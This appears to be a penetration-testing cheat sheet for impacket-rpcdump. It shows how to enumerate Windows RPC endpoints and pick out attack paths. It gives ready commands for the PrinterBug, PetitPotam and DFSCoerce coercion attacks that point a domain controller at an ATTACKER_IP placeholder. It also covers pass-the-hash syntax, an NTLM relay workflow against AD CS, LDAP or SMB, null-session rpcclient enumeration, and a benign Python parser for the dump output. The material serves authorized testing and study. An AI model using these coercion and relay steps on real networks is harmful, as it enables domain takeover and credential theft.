
Overview

impacket-rpcdump queries the RPC Endpoint Mapper (TCP port 135 by default) and lists every interface registered with it: the interface UUID and version, the protocol name impacket knows it by, the hosting binary, and the string bindings (dynamic TCP ports, named pipes) it listens on. That reveals which services are running and reachable, which is valuable for attack planning. Over TCP/135 the lookup is anonymous, so no credentials are needed. The listing is only what services chose to register: an interface exposed solely over a named pipe without registering, or one behind a host firewall, may be absent even though it answers.

Basic Usage

Dump all RPC endpoints:
impacket-rpcdump 10.10.10.5
With explicit port:
impacket-rpcdump 10.10.10.5 -port 135
Each entry shows the protocol (interface) name, the provider binary, the interface UUID and version, and the string bindings (dynamic TCP ports and named pipes):
Protocol: [MS-RPRN]: Print System Remote Protocol
Provider: spoolsv.exe
UUID: 12345678-1234-ABCD-EF00-0123456789AB v1.0
Bindings:
  ncacn_ip_tcp:10.10.10.5[49668]
  ncacn_np:\\DC01[\pipe\spoolss]

Interesting Interfaces

MS-RPRN (PrinterBug / SpoolService)

UUID: 12345678-1234-ABCD-EF00-0123456789AB. If this interface is listed (typically with a \pipe\spoolss binding), the Print Spooler is running and the target is a PrinterBug candidate: an authenticated domain user calls RpcRemoteFindFirstPrinterChangeNotificationEx and the spooler makes the machine account authenticate to an attacker-controlled host. The listing shows the service is up, not that the call succeeds; confirm with the coercion tool itself.
impacket-rpcdump 10.10.10.5 | grep -i "MS-RPRN\|spoolsv\|12345678-1234-ABCD"
Exploit with:
# SpoolSample / PrinterBug
python3 printerbug.py CORP/user:Password1@DC01 ATTACKER_IP

# Or dementor.py
python3 dementor.py -d corp.local -u user -p Password1 ATTACKER_IP DC01

MS-EFSRPC (PetitPotam)

UUID: c681d488-d850-11d0-8c52-00c04fd90f7e (EFSRPC reached over \pipe\lsarpc). UUID: df1941c5-fe89-4e79-bf10-463657acf44d (EFSRPC reached over \pipe\efsrpc). Encrypting File System Remote Protocol. On unpatched hosts the EfsRpcOpenFileRaw call can be triggered without credentials; Microsoft's August 2021 update (CVE-2021-36942) closed the unauthenticated path, so later PetitPotam variants need a valid domain account. Because EFSRPC is served through SMB named pipes, it may not be registered with the endpoint mapper even when the pipe answers, so an empty grep here is not proof of absence.
impacket-rpcdump 10.10.10.5 | grep -i "c681d488\|df1941c5\|EFSRPC\|efsr"
Exploit with:
python3 PetitPotam.py ATTACKER_IP DC01 -d corp.local -u user -p Password1

MS-DFSNM (DFSCoerce)

UUID: 4fc742e0-4a10-11cf-8273-00aa004ae673. Distributed File System Namespace Management, served by dfssvc.exe over \pipe\netdfs (normally only on domain controllers). Another coercion vector (NetrDfsRemoveStdRoot / NetrDfsAddStdRoot); requires domain credentials. Do not grep for "dfsr": that is DFS Replication, a different interface.
impacket-rpcdump 10.10.10.5 | grep -i "4fc742e0\|DFSNM\|netdfs"
Exploit with:
python3 DFSCoerce.py ATTACKER_IP DC01 -d corp.local -u user -p Password1

Other Notable Interfaces

Interface   UUID                                    Significance
MS-SAMR     12345778-1234-ABCD-EF00-0123456789AC    SAM database access, user enumeration
MS-LSAD     12345778-1234-ABCD-EF00-0123456789AB    LSA policy, domain trust info
MS-DRSR     e3514235-4b06-11d1-ab04-00c04fc2dcd2    Directory Replication (DCSync)
MS-SCMR     367abb81-9844-35f1-ad32-98f038001003    Service Control Manager (psexec/smbexec)
MS-TSCH     86d35949-83c9-4044-b424-db363231fd0c    Task Scheduler (atexec)
MS-WMI      8bc3f05e-d86b-11d0-a075-00c04fb68820    WMI (wmiexec)
A listed interface only tells you the service is up; what you can do with it is decided by each operation's own access check (DCSync needs replication rights on the domain, SCMR/TSCH/WMI execution needs local admin on the target).

Filter by Specific Port

Show the interface bound to a specific dynamic port (binding lines follow the Protocol/Provider/UUID header, so look backwards, and escape the brackets or grep treats them as a character class):
impacket-rpcdump 10.10.10.5 | grep -B4 "\[49668\]"
Show only named pipe bindings:
impacket-rpcdump 10.10.10.5 | grep "ncacn_np"
Show only TCP bindings:
impacket-rpcdump 10.10.10.5 | grep "ncacn_ip_tcp"

Authentication

Over the default TCP/135 transport the endpoint mapper lookup is anonymous, so rpcdump needs no credentials and does not use any you pass:
impacket-rpcdump 10.10.10.5
If TCP/135 is filtered, query the mapper through SMB instead (\pipe\epmapper on 139/445); that path authenticates, so supply credentials:
impacket-rpcdump -port 445 CORP/admin:Password1@10.10.10.5
Pass-the-hash (LMHASH:NTHASH or :NTHASH; the LM half can be left empty. Note that aad3b435b51404eeaad3b435b51404ee is the empty LM hash, not an NT hash, so it belongs before the colon if anywhere):
impacket-rpcdump -port 445 -hashes :NT_HASH CORP/admin@10.10.10.5

Using Output for Attack Planning

Run rpcdump and check which attack paths are available:
# Check for coercion attacks
impacket-rpcdump 10.10.10.5 | grep -iE "MS-RPRN|MS-EFSRPC|MS-DFSNM|spoolsv|efsr|netdfs"

# Check if DCSync is possible (MS-DRSR exposed)
impacket-rpcdump 10.10.10.5 | grep -i "e3514235"

# Check for WMI execution (wmiexec)
impacket-rpcdump 10.10.10.5 | grep -i "8bc3f05e"

# Check for Task Scheduler (atexec)
impacket-rpcdump 10.10.10.5 | grep -i "86d35949"

# Check for Service Manager (psexec/smbexec)
impacket-rpcdump 10.10.10.5 | grep -i "367abb81"
Typical workflow:
  1. Run rpcdump on the DC
  2. Identify exposed coercion interfaces (RPRN, EFSRPC, DFSNM)
  3. Set up ntlmrelayx (targeting AD CS web enrollment, LDAP/LDAPS or SMB on another host) or Responder
  4. Trigger coercion so the DC machine account authenticates to you; relay that authentication, since a machine account's NetNTLM response is not practically crackable and capturing it alone gains little
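The greps above answer one question at a time. As an added example (not part of this page's original content and not impacket's own code), the following Python script parses the Protocol/Provider/UUID/Bindings blocks rpcdump prints and produces the whole triage in one pass: which coercion and execution interfaces are registered, and which bindings sit on a given port or transport. It needs no impacket install and runs on a saved dump (argv[1]) or, with no arguments, on the constructed SAMPLE embedded below; the UUIDs are the ones listed on this page, and the labels and sample hostnames/ports are assumptions for illustration.

```python
#!/usr/bin/env python3
"""Offline triage of impacket-rpcdump output.

Added example, not part of impacket or of the original page. Parses the
Protocol/Provider/UUID/Bindings blocks rpcdump prints and flags interfaces
relevant to coercion and remote execution. Usage: triage.py [dump.txt]
"""
import re
import sys
from dataclasses import dataclass, field

# Interface UUIDs from the page's tables, lowercased for comparison.
COERCION = {
    "12345678-1234-abcd-ef00-0123456789ab": "MS-RPRN (PrinterBug)",
    "c681d488-d850-11d0-8c52-00c04fd90f7e": "MS-EFSRPC (PetitPotam, \\pipe\\lsarpc)",
    "df1941c5-fe89-4e79-bf10-463657acf44d": "MS-EFSRPC (PetitPotam, \\pipe\\efsrpc)",
    "4fc742e0-4a10-11cf-8273-00aa004ae673": "MS-DFSNM (DFSCoerce)",
}
EXECUTION = {
    "e3514235-4b06-11d1-ab04-00c04fc2dcd2": "MS-DRSR (DCSync)",
    "367abb81-9844-35f1-ad32-98f038001003": "MS-SCMR (psexec/smbexec)",
    "86d35949-83c9-4044-b424-db363231fd0c": "MS-TSCH (atexec)",
    "8bc3f05e-d86b-11d0-a075-00c04fb68820": "MS-WMI (wmiexec)",
}

# Constructed sample in rpcdump's output format (assumed host/ports, not a real capture;
# the last block uses a made-up UUID to show how unknown "N/A" entries are handled).
SAMPLE = r"""
Protocol: [MS-RPRN]: Print System Remote Protocol 
Provider: spoolsv.exe 
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0 
Bindings: 
          ncacn_ip_tcp:10.10.10.5[49668]
          ncacn_np:\\DC01[\pipe\spoolss]

Protocol: [MS-DRSR]: Directory Replication Service (DRS) Remote Protocol 
Provider: ntdsai.dll 
UUID    : E3514235-4B06-11D1-AB04-00C04FC2DCD2 v4.0 
Bindings: 
          ncacn_ip_tcp:10.10.10.5[49667]

Protocol: [MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol 
Provider: dfssvc.exe 
UUID    : 4FC742E0-4A10-11CF-8273-00AA004AE673 v3.0 
Bindings: 
          ncacn_np:\\DC01[\pipe\netdfs]

Protocol: N/A 
Provider: N/A 
UUID    : 11111111-2222-3333-4444-555555555555 v1.0 
Bindings: 
          ncalrpc:[constructed-lrpc-endpoint]
"""

UUID_RE = re.compile(r"([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})\s*(v[\d.]+)?", re.I)


@dataclass
class Endpoint:
    protocol: str
    provider: str = ""
    uuid: str = ""
    version: str = ""
    bindings: list = field(default_factory=list)


def parse_rpcdump(text):
    """One Endpoint per 'Protocol:' block; the indented ncacn_*/ncadg_*/ncalrpc
    lines under 'Bindings:' are that interface's string bindings."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Protocol:"):
            cur = Endpoint(protocol=line.split(":", 1)[1].strip())
            entries.append(cur)
        elif cur is None or not line:
            continue
        elif line.startswith("Provider:"):
            cur.provider = line.split(":", 1)[1].strip()
        elif line.startswith("UUID"):
            m = UUID_RE.search(line)
            if m:
                cur.uuid, cur.version = m.group(1).lower(), m.group(2) or ""
        elif line.startswith(("ncacn_", "ncadg_", "ncalrpc")):
            cur.bindings.append(line)
    return entries


def find(entries, table):
    """Map each interesting interface label to the bindings it is exposed on."""
    hits = {}
    for e in entries:
        if e.uuid in table:
            hits.setdefault(table[e.uuid], []).extend(e.bindings)
    return hits


def bindings_on_port(entries, port):
    """(uuid, binding) pairs for endpoints on one TCP port; unlike grep -B,
    the UUID travels with the binding."""
    return [(e.uuid, b) for e in entries for b in e.bindings if b.endswith(f"[{port}]")]


def bindings_by_transport(entries, transport):
    """All bindings for one transport, e.g. 'ncacn_np' or 'ncacn_ip_tcp'."""
    return [b for e in entries for b in e.bindings if b.startswith(transport + ":")]


def triage(text):
    """Full report: coercion and execution candidates plus per-transport bindings."""
    entries = parse_rpcdump(text)
    return {
        "coercion": find(entries, COERCION),
        "execution": find(entries, EXECUTION),
        "named_pipes": bindings_by_transport(entries, "ncacn_np"),
        "tcp": bindings_by_transport(entries, "ncacn_ip_tcp"),
    }


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE
    report = triage(text)
    for section in ("coercion", "execution"):
        print(f"== {section} candidates (registered, not proven exploitable) ==")
        for label, binds in report[section].items():
            print(f"  {label}: {', '.join(binds)}")
    print(f"named-pipe bindings: {len(report['named_pipes'])}, TCP bindings: {len(report['tcp'])}")
```

Save the dump first (impacket-rpcdump 10.10.10.5 > dc01.txt) and run the script on it. The report lists candidates only: an EFSRPC interface missing from the mapper still has to be tested directly, and a listed MS-DRSR interface does not imply replication rights.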

rpcclient (from Samba) complements rpcdump for deeper interaction:
# Connect with NULL session
rpcclient -U '' -N 10.10.10.5

# Enumerate domain users
rpcclient $> enumdomusers

# Enumerate domain groups
rpcclient $> enumdomgroups

# Get user info by RID
rpcclient $> queryuser 0x1f4

# Get domain password policy
rpcclient $> getdompwinfo

Quick Reference

# Dump all endpoints (NULL session)
impacket-rpcdump 10.10.10.5

# With credentials (only used on the SMB transport, 139/445)
impacket-rpcdump -port 445 CORP/admin:Password1@10.10.10.5

# Pass-the-hash (LMHASH:NTHASH or :NTHASH)
impacket-rpcdump -port 445 -hashes :NT_HASH CORP/admin@10.10.10.5

# Check for PrinterBug
impacket-rpcdump 10.10.10.5 | grep -i "MS-RPRN\|spoolsv"

# Check for PetitPotam
impacket-rpcdump 10.10.10.5 | grep -i "c681d488\|df1941c5\|EFSRPC"

# Check for DFSCoerce
impacket-rpcdump 10.10.10.5 | grep -i "4fc742e0\|DFSNM\|netdfs"

# Check all coercion vectors at once
impacket-rpcdump 10.10.10.5 | grep -iE "RPRN|EFSRPC|DFSNM|spoolsv|efsr|netdfs"

# TCP bindings only
impacket-rpcdump 10.10.10.5 | grep "ncacn_ip_tcp"

# Named pipe bindings only
impacket-rpcdump 10.10.10.5 | grep "ncacn_np"

# Endpoint mapper over RPC-over-HTTP (ncacn_http, port 593)
impacket-rpcdump 10.10.10.5 -port 593

Flag          Description
-port         Endpoint mapper port: 135 (TCP, anonymous, default), 139 or 445 (SMB \pipe\epmapper, authenticated), 593 (ncacn_http)
-hashes       NTLM hashes for pass-the-hash (LMHASH:NTHASH or :NTHASH)
-target-ip    Explicit target IP (when the positional target is a hostname)